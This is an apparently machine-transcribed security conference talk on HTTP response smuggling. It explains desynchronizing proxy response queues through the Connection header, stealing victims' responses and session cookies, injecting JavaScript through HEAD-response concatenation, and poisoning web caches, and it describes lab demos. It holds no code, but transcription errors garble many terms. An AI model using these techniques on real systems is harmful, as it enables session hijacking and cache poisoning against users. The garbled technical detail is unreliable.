 Hello, my name is Martín Dalinar. I'm a security researcher at the Anapsis Labs and today I'm going to present a new set of techniques that can be used to obtain control over the response queue in a persistent connection by exploiting different HTTP desynchronization vulnerabilities. The agenda for today, first I'm going to make a quick recap on HTTP request mapping and even though I expected most of you already know what request mapping is, I'm still going to make a quick introduction and I will also talk about desynchronization variants and about one in particular that will be used through the rest of the presentation for both demos and examples. After this introduction, I'm going to explain why it's response bagging and how to use it for different malicious purposes and I will show how to hijack responses and requests from a persistent connection and how to obtain reliable results in real systems. Next, I'm going to demonstrate how to concatenate multiple responses and build malicious payloads to take control over the victim's browser and also using this I will demonstrate how to poison the work cache of an HTTP proxy by storing a brass message as the response of any endpoint the attacker wants. Finally, I'll explain how to split responses and inject arbitrary messages that will be stored in the response queue and will be delivered back to other clients by the proxy. So, request mapping is an attack introduced in 2005 by WatchFire which abuses the differences between a frontend and a backend server. These differences are related to the way the HTTP parser calculates the body length of a request and the idea is that the attacker sends a request containing multiple message length such as content length or different frontend codeings and if the frontend calculates the length of the body using a different header then it will be possible to split the request and inject the prefix for the next message. Let's see an example of this in which two content length headers are sent in the same request. In this example the proxy will only use the first content length if multiple headers with the same name are sent and the backend will instead only use the last content length to calculate the body size. When the attacker sends this request the frontend will forward the entire message as it will think that the body is of 32 bytes. However, when this message reaches the backend only the first 5 bytes of the body will be considered to be part of the request. The extra 27 bytes will be split and used as the prefix of the next request processed by the backend. If a victim's request arrives after the attacker's one it will be concatenated to the injected prefix causing the backend to believe that the victim issued a request to the ddmy account where instead it issued to the myaccount endpoint and as decision cookies of the victim are also included the application will probably delete his account. But also the response of this request will be sent back to the victim and if it contain any malicious payload such as a JavaScript it will be executed on the client's browser as well. But these attacks were forgotten for many years as they were thought to be that they couldn't be used in real systems but this changed in 2019 when James Cato reported this idea by providing a new methodology to first detect different desynchronization parameters then confirm that it is possible to use them to smuggle a request and finally to explore and exploit the different features provided by the application. What's more he was able to demonstrate that these techniques could be applied in many real systems and it was possible to collect a lot of bounties from different vendors. Also in 2019 and 2020 many desynchronization variants were presented by researchers. These are techniques that can be used to force the discrepancy between servers by hiding message line heroes such as the content length from a specific parcel. In most cases this is done by placing extra special characters such as a space or a non printable letter and in this way a server will fail to recognize the hero name or the value as the valid message line hero. But even though these flows can be found in many parsers it is also possible to cause desynchronization by using a feature that is provided just by the ACP protocol itself. And to understand this technique first I'll explain the difference between an end-to-end and a hope-by-hope hero. So end-to-end heroes are those that are intended to travel from the client to the backend server and forwarded by any proxy in the middle. On the other hand hope-by-hope heroes are intended to travel only to the next node in the communication chain and for this reason proxies must not forward these heroes and they should remove it from their request before being forwarded. And one of the most interesting hope-by-hope heroes defined in the htbrfc is the connection hero. This directive can be used to specify connection options that could be used to establish and maintain a connection between two nodes. And these options must not affect other connections so again they should not be forwarded by any proxy receiving them. Some well-known connection options are closed or give a life but also the protocol allows the client to declare any custom value he wants. And it also allows to use this connection option as an extra header to give the proxy or the servers more information on how to persist the tcp communication. So let's see an example of our request containing two connection options. First the client will declare them as a connection value and then the two options are also declared as separated heroes. But when a proxy forward this request it will remove both the option and keep a life here and as well as all the connection directives. But what if instead of specifying some useless value as a connection option we declared an end to a hero such as the content length. When the proxy receives the request it will consider the bodies of 13 bytes and it will forward it. But before it does it will remove the content length here as it was declared as a connection option. So when the backend receives this it will think that the body is empty and it will split the message. This will cause that the smuggled data is used as the prefix for the next arriving request. Now this issue was reported under the Google's vulnerability reward program and Google fixed it and confirmed that it was possible to use it to smuggle requests in all their public domains. Now let's see how this desynchronization parameters can be leveraged to produce useful exploits in web applications. First we could use request mapping to bypass frontend controls such as filters to forbidden endpoints and this can be done by smuggling the forbidden request which will not be seen by the proxy and will be forwarded to the backend. However this technique does not bypass authentication for most resources and in most real applications it will fail if the response is not received by the attacker and if the filter is not placed in the vulnerable proxy. Another quotation technique is hijacking victim's request but this can only be done if the web application offers some data storage feature that is the attacker can only hijack victim information if it can be stored or retrieved which is not that common in all applications and also these kind of features are offered only to or in most cases are only offered to authenticated users and so the attacker will need to have a valid account or a valid session. Next we could use request mapping to upgrade existing vulnerabilities such as cross-site scriptings but in this case the attacker will be able to distribute the payload without having to interact with the victim and in this case it will not have to force the client to trigger the attack doing some action. The same idea could be applied for any vulnerability requiring interaction such as an open write-in rate but to do this or to improve this kind of vulnerabilities the attacker needs first to find another vulnerability such as the cross-site scripting because if not there will be nothing to be upgraded and finally the synchronization of vulnerabilities can be used to perform different web cache attacks such as web cache poisoning and this can be done by modifying the response of a cacheable resource by applying a prefix in the backend's request however this is only possible to poison resources that were cacheable and only if proxies ignores the cache control header. If this is not the case then the malicious response will not be stored by the web cache and the attack will fail. Some other techniques might also be possible but in most cases it is required that the system provides some rather uncomfortable features or have other vulnerabilities so I'm not going to talk about them. So by now all attacks rely on injecting a prefix in the request queue of a persistent connection however exploiting this might not be as trivial as you would like. There are many prerequisites to successfully take advantage of these vulnerabilities so we would like to look for other options but what if instead of placing focus on the request we would look at attacks affecting the response queue of the connection. With this in mind I started thinking about what would happen if instead of injecting a prefix for the next message we would smack a complete request that will alone produce an extra response. If this happens the proxy will issue one request but it will receive two different responses from the backend and if a victim later sends another message to the proxy it will be forwarded but in this case the remaining extra response which corresponds to this valid request will be sent back to the victim and as the victim response got the synchronized to an attacker would then send another request to the hijacked to hijack the horrifying response and if this response was issued after a locking message for example then the attacker will be able to receive some sensitive information such as the session cookies or any other session talking that was intended to the victim. To better understand this technique let's see how requests and responses are associated at the proxy and at the backend. First both the attacker and the victim will send a request to the frontend they will be stored in the request queue and forwarded to the backend server through the same connection however when the malicious payload reaches the backend it will get split producing two different responses and now all three responses the two that were generated by the attacker and the one generated by the victim will go back to the proxy here the first for the first response will be forwarded to the attacker and the second one which corresponds to the smuggled message will be forwarded to the victim. However as the proxy only issued two requests it will wait for a new message before it can forward the last response. In this case if the attacker is able to send a new message he will end up obtaining the victim's response and in that response also some sensitive information such as for us as we already said for example the session cookies that were that were created after our login request. But what if instead what if we try to use these techniques in real in real systems we'll find that the results that we obtain are not as we expected and the reliability of these attacks can make us think that they are not as useful as it sounds. So here we can see the communication between a proxy and a backend and in this capture an attacker was trying to desynchronize the response queue but each time a request was sent the connection was closed by the proxy. This means that the attack is failing and the reason for this is that the the proxy resets the connection every time it receives an extra response and therefore we cannot send extra responses before the the proxy creates a new request and only after a thousand requests I was able to smuggle a single response and actually hijack a victim's message. But of course this is not the desired or expected result so why this is happening and to understand this first let's take a look at what is going on under the hood and to do so let's explain I will explain one concept that is what's introduced in htp 1.1 and we in which all the desynchronization attacks rely on. First remember that the biggest chain between htp 1.0 and 1.1 is the ability to persist the cp connections and to send multiple requests and response pairs through the same connection this means that the client is not forced anymore to close the collection after receiving a response instead it could use it to send more messages increasing the performance of the network however this concept is sometimes confused with another important feature that is provided by the htp protocol which is the ability to pipeline different messages through the same connection so htp pipeline is what allows a client to send multiple requests without having to wait for previous responses this means that if a client needs to send let's say two requests to the same server this can be done at the same time concatenating them through the same channel and it is the job of the server or the back or the proxy to split them and resolve each producing their corresponding responses and as we saw in previous examples the way each request is matched with each response depends only on the order they were received and forwarded the first response will correspond to the first request and this will be done by using the first in first download scheme order and that's why we will call requests and response queues because they will actually work as queues and there is no other way of matching different responses and requests such as an id or anything so the only way to do it is using the order that where they were issued and they were received but here's the catch most proxies won't enforce pipelineing meaning that if two or more requests from different sources reach the proxy they will be concatenated they won't be concatenated together and they will be forward and they won't be forwarded together to the backend server instead they will be sent through different free tcp connections which won't affect each other and so the attacker won't be able to play with the connection queue of the victim and this will prevent the attack but also future request or future client request reaching the server won't go through the same connection that the attacker used previously and this is because the extra response injected by the attacker is received by the proxy and will be interpreted as a communication error this is because the proxy did not issue any any new request and so it shouldn't be receiving any extra response if this happens then the proxy will think that there is a problem in the communication and will just close the connection and also when closing this connection the extra response that was received will be discarded and so it won't affect any any future requests so what can an attacker do to solve this problem first to hijack our response an attacker will need to smack two responses but they cannot be sent back together to the proxy because as we saw in this case the proxy will close the connection because it will see an extra response so to avoid this a new request must be forwarded by the proxy so that when the response arrives the connection is persistent but this new request can only be sent after the first response goes back to the proxy this is because the proxy won't forward any other request through the same connection until the request until the request queue of this connection is free so the idea will be to send a time consuming request as this battle message and this request this request will take some time to be processed and the server will take some time to generate a response for this request and this time will be just enough for the next victim's message to reach the proxy and reach the proxy's request queue therefore when the response is forwarded back it will be sent back to the client and the attacker will now be able to send a fast request and hijack the extra response which in this case is the response that was issued for the for the victim it is not necessary that the sleepy request take a lot of time it is just about knowing that it's just about knowing this time and calculate the the transmission time to play with them this will allow an attacker to know the best little time between payloads and the best time that he has to wait before sending the next attack and under normal conditions using different proxies and backend servers i was able to observe huge improvements okay so i was able to actually see how these requests are being smuggled and the connection is being persisted and as you can see the same attack using a different smuggled endpoint will will give much much better results and in this case the connection was persisted for 14 requests this means that the response were desynchronized for 14 clients and that is a really a really good number if we thought that if we think that before we were only getting one out of a thousand if we are able to inject complete requests that will produce an extra response what will stop us from injecting multiple messages from a technical perspective it's the same to smuggle one two or ten requests that will produce one two or ten extra responses and this will be useful for other more complex exploits but for now we can see that there are some simpler attacks that we can that we can perform and that we can leverage from these techniques first it is possible to inject multiple nested responses to effectively distribute our payloads such as a java script using a reflected cross-size scripting as we already saw if we send instead of one many different smuggled requests that will produce this payload then we will be able to poison the next end amount of clients also nested requests can be used to consume resources from both the backend and the frontend server and as one request can produce multiple messages that would need to be processed at the backend this could consume a lot of cpu time and as the responses must also be generated and in some cases stored then this could affect also the memory buffer of the application but it could also combine nested injection with a classic request magnetic gig and if an application with a synchronary allows for constant reflection even if this reflected parameter is properly coded it is possible to also hijack a request from the victim instead of only a response and this will be done by smuggling two different messages the first one will be as deep request as we already saw which only proposed is to desynchronize the response queue just as we explained previously and next the second smuggled request will not be completed and we'll try to reflect some data that is also concatenated with it this is done as in any other request smuggling attack by using a content length that is greater than the body of the request as always the first response will be sent back to the attacker and this will allow that the the new victim's requests are right to the backend because if not as we saw the proxy won't forward the request through the basic connection after this the sleeper request will get resolved and the response will be forwarded to the victim now if the last smuggled request contained a large content length it would be used as the sorry it will use the victim's request as part of the body but it will still need more data and as the connection is empty and the attacker can now send a large request that will complete the body it will cause that the response containing the victim's request as the reflected data is sent back to the attacker so after seeing this work in a real system I was kind of excited but then I started wondering is it possible to also confuse the hdb parser when responses are sent back of course we could perform the same tricks as with the sync parents but for this we would need to control the mesic leg hitters of the response and that would probably not going to happen and that's not something that's not going to happen however I also start thinking is there a difference on how the length of the body is calculated between requests and responses and the answer given by the hdb rfc is yes the the difference is that for some specific responses the body must always be empty and these responses are some special status code like the 204 and 304 but also responses that are generated out of a head request so what makes so interesting this kind of responses is that not only they depend on the request they generate them but that it must always be an exact replica of the hitters in the same get response so when a when a head response is generated the only difference that would happen when they get response to the same endpoint will be that the body will not be there but the rest of the hitters should be the same and this includes of course the content length even though it is optional that the content length appear it does involve three applications and if it appears the value will not be zero if the response contains the body instead it will contain the same value and will hope that the proxy knows that the response is special and that it contains a content length that should be ignored because it's the it's the response of a head request but if the proxy fails too much that these responses it was issued from a from a head request then what will happen and of course the body in this the content length in this case will be used and it will indicate a wrong value because the head response will contain no body and a content length hitters with different value of zero at this synchronization will cause that requests and responses are not properly matched by the proxy it will be possible to use a head smuggled request to generate a malicious response this will contain a content length hitter which in this case will be considered to contain the actual size of the body if an attacker smuggles two requests to the back end the first response generating will generate the the carrying message which generated by the carrying message will go back to him next another request will arrive to the proxy and it will be forwarded to the back end now the back end will send it will send the first response which in this case will be to a head request when this message is received by the proxy it won't be forwarded right away this is because the content length hero states that the body is not empty and the request matching this this response contains the head the head method and not the head method this means that if the body if the body of the response was empty but the content length states that it shouldn't be then the proxy will wait for more data to be used and then forward this response so when the next response arrives to the proxy it will be used as part of the body of the previous message this will now be delivered back to the client which issues the which issued the second request and also the remaining of the response will be sent back to the next client issuing a request but that's only if the proxy think that this is a valid htp message which in this case is not to understand these ideas let's see how the different htp messages travel through the connection first attackers the attacker will send its request to the proxy which will forward it to the back end server there the message will be split in three and the first response will be sent back to the attacker as always after this the victim will issue a new request in this case a get request but it will also be any other except for the head one the request will also be forwarded to the back end server and when the standard response arrives to the proxy they will be concatenated together and sent back to the victim if the remaining of the split response are not a valid response then the connection will be closed and the response will be discarded the extra response and that is because the proxy will think that again there was a communication error but why it could be useful to concatenate multiple responses we already were able to control the response queue and the responses that the victim were receiving so anything that we can concatenate we could also have sent it with a single request and is that right we're not really and this is because we when we concatenate two responses one of them will have its headers used as the body of the previous message this means that if the data is reflected in headers then which is something rather common in most applications let's think of a redirect or something that can allow an attacker to reflect some data in the heroes of the response then an attacker will be able to reflect this in the body of the request of the response sorry and if the heroes containing any specific content type directives such as the text HTML then this reflected content that was present in the heroes will now be considered as HTML data and with this could allow an attacker to inject let's say a message to a malicious server script payload or any any HTML tag that he desires and of course this will be executed in the client's browser and the same applies for any parameter reflected in a non-script old content length content type sorry so if we are able to reflect some content in let's say the plain text type then we can compare this to another content type by using different headers to to change the behavior of the of the response and of course this effect could be combined with other techniques to reflect other requests and responses in the message body so now we will see a demo I was able to prove all these techniques in three major vendors but unfortunately they were not able to fix the issues at the time of this presentation so to solve this problem I will deploy the small testing lab using a burning web cache as the front end and the the engine x last version as the backend server in this case the burnish hdv parser is vulnerable to the sync variant the that I explained previously the connection the sync variant so it will be possible to smack a request using the connection header to hide the content length first we can see that the web application consists of three endpoints all with almost static responses the paths are slash home slash hello smuggle and also any other path we without with any other string will be used to direct direct to the home page again here in the we can see this in the review window if I send the hello smuggle request with the get method we can see that the response contains a content length greater than zero and a content type here saying that the body should be treated as an HTML document the same hero will with the sorry the same heroes with the same value are obtained if a hand request is sent and just as expected by the htprc specification also we can see that the behavior of the redirect feature includes reflecting the query string in the location here this would be used to place the malicious java creep and hijack the the victims browser so now using true intruder which is another great contribution from james kettle I will smuggle the content lettering response which will be sent back to the victim also consider that this demo was built using the same features found in all three mentioned vendors and so this applies to too many to many real systems that can be can be found in in almost any any component you can see that once the attack is started all following victims request obtain the malicious response and only when any request is sent with the browser this javascript will be executed and this will happen every time we we request for for anything in the in in the system but finally if the attack stop if the attacker stops sending this malicious payload then the synchronization will conclude and the user will see that the application works expected still this attack gets even worse when a web cache is available remember that the that request mapping could be used to poison certain endpoints with other existing responses well with response mapping those restrictions are gone and attacker will be able to poison any endpoint he wants and the responses that can be used to to poison these same points just need that the heat that the heat response contains a cache control heater which will cause that the message to be stored in the cache and as the attacker can send multiple pipeline requests it is possible to poison the cache with a single request which will be spitted also by the proxy and this will cause that the second request get poisoned with the response of the smuggled message as an example let's see what happened when an attacker smells a head cash a cash ammo request as usual the proxy will send the first response back to the attacker next it will concatenate the head request or the head response with the cache control heater that will tell the web cache to store this response with the second smuggled response in this case containing the malicious coverage of a script and finally the next request which was also issued by the attacker will be responded this time with the concatenating message which will force the web cache to store this for the future request so when a client request so when a client request for the same resource that the attacker specified the malicious response will be sent back without the need of any extra actions because it will be stored in the cache for the specific resource i believe it will help to see this in the following diagram as i said the attacker will send two pipeline requests one contains the smuggled payload and they are specifying the URL that will be poisoned this can be any endpoint that the attacker wants even non-existing endpoints will work the request will get splitted by the proxy and forwarded to the back-end server and as you can see the messages are piling from the source so this will work even if the if piling is not enforced or even allowed in this case the request will be still being queued in the same connection and the only difference is that they will be sent consecutively but not concatenated now the back-end server will again split the messages and produce four isolated responses that will that are returned back to the proxy here both responses will go back to the attacker but sorry the um yeah both responses will go back to the attacker but the second one will be stored in the cache for the endpoint indicated in the second pipeline request so in the second request that the proxy was able to recognize will be used to store the the results of this of this response this way when a victim issues a request for the same endpoint that the attacker specified the proxy will find a match with this key in the cache table and it will return the store response and in this case the malicious payload with the with the javascript will be sent back to the to the victim that the attacker injected remember that this technique can be used every time a web cache exists as there are no extra requirements even if the cache control header is not used there will be at least one euro that can be used to start poisoning the cache with malicious responses and that is if the if there is a web cache existing in any proxy of the communication chain and the same technique can be used to force victims into storing their own responses in the cache and if their response contains sensitive victim's data it will place in the cache and laborer and attacker can access it through the same endpoint that the victim requests this is known as web cache inception and in this case it can even be used to store dynamic responses such as those that are issued from logging requests and they will contain among any other data that data such as session cookies or any other token that the victim will receive in his response so again in this case the attacker can use this to store anything and it will work as an improved cache reception attack because in this case as I said the dynamic information can be stored now for the second demo I will use the same lab as in the previous example but this time with a new endpoint that can be cacheable in this case it will also be called cacheable and this will be available in the home page as you can see this is also a static resource but in this case the cache control header is used to indicate that the response to this request should be stored by the web cache in this attack I will attempt to poison the hello smuggler endpoint to return a malicious script using the same redirect URL to inject the payload in the body of the health response as we already saw in the previous example however this time the health response will contain the cache directive and will cause that this response gets stored for any endpoint that the attacker wants the same connection the same vulnerability will be leveraged to smuggle the response and also a request for the poison endpoint will be placed by planning after the malicious one so the second request that we are seeing or the last request that we are seeing is actually the request that will be poisoned once this request is sent the hello smuggler endpoint will get poisoned and all following requests will receive the response containing the JavaScript injected by the attacker this will cause that the browser executes an eval function to open another message and the same effect can be caused on any endpoint the attacker wants so the same test is performed against the home path and again the URL gets poisoned and every time a victim requests this resource the JavaScript will be retrieved and it will be executed opening another box and showing that the attacker that the attack was successful finally the last exploitation technique involves using the remaining bytes of the splitter response as another extra message that will also be placed in the response queue exploiting these behaviors will be almost the same as exploiting htp response splitting vulnerabilities such as those obtained from line break header instructions and in those cases an attacker would split a response using some reflection in the header name or in the header value which will allow the attacker to place extra line breaks to control the boundaries of the headers in this case the idea would be to use the heat the heat message to split our response which contains reflected data in this body on its headers and this reflected data it must be possible to include line breaks characters to build a valid htp response this behavior this behavior is not that rare in in reflected data that is inside the body as there is no vulnerability associated with this feature this is not true for line breaks reflection in the headers and so that's why it's so rare to find them in the wild and that's why it's so rare to find htp response splitting vulnerabilities so again the first non-smattled response will go back to the attacker as in previous examples and then the following request arriving to the proxy will be forwarded to the set through the same connection the backend will send back both smattle responses and they will be concatenated at the proxy which will forward the first message to the client which issues the last request and then as in the case as in this case the remaining bytes are also valid response are valid htp response they will be forwarded back to the next line which sends a request to the proxy and in this case if the attacker was able to reflect the line break it will be possible to set any arbitrary response controlling both the the headers and the body of the message however this attack is not that easy to perform because it requires that the proxy either stores the response or that the pipeline or pipeline is allowed and even enforced if no web cache is available so that's why it's it that's hard to to exploit this kind of attacks or this kind of techniques and why it's not that easy to actually exploit htp response splitting vulnerabilities so some conclusions to finish first we can say that the response battling that response binding does not rely on extra vulnerabilities or special conditions to work this is because most of the requirements for the explaining techniques rely on the features that the htp protocol offers what's more almost no exploration phase is required and attacks presented in this talk can work only with few static endpoints such as the ones we i showed in the in the demo and also using response battling will allow an attack to hijack both requests and responses in all cases fully compromising the confidentiality of the application next using nested instructions and an arbitrary cache poison it will be possible to avoid users from obtaining valid responses from the web application either by affecting the resources of the server or by storing storing malicious pay loads replacing valid endpoints what's more response computation and scripting as well as classic request mapping can be used to modify and control the request and response queue of a persistent connection this completely compromised the integrity of the connection queue and the web application itself and also client browsers can be controlled using arbitrary javascript when response instruction is possible or when the web cache of a proxy is enabled and finally with added with a detailed analysis of the transmission and processing time it is possible to increase the reliability of the attack and obtain these results with a few malicious requests so all this should be enough for vendors to once and for all understand that a desynchronization reality just by itself should be seen as one of the most critical vulnerabilities or the most critical web vulnerabilities that a system can have now i will answer any question that you might have and you can also send me any question or doubt that you have or if you would like to talk about this subject you can do it through my email or through my Twitter account thank you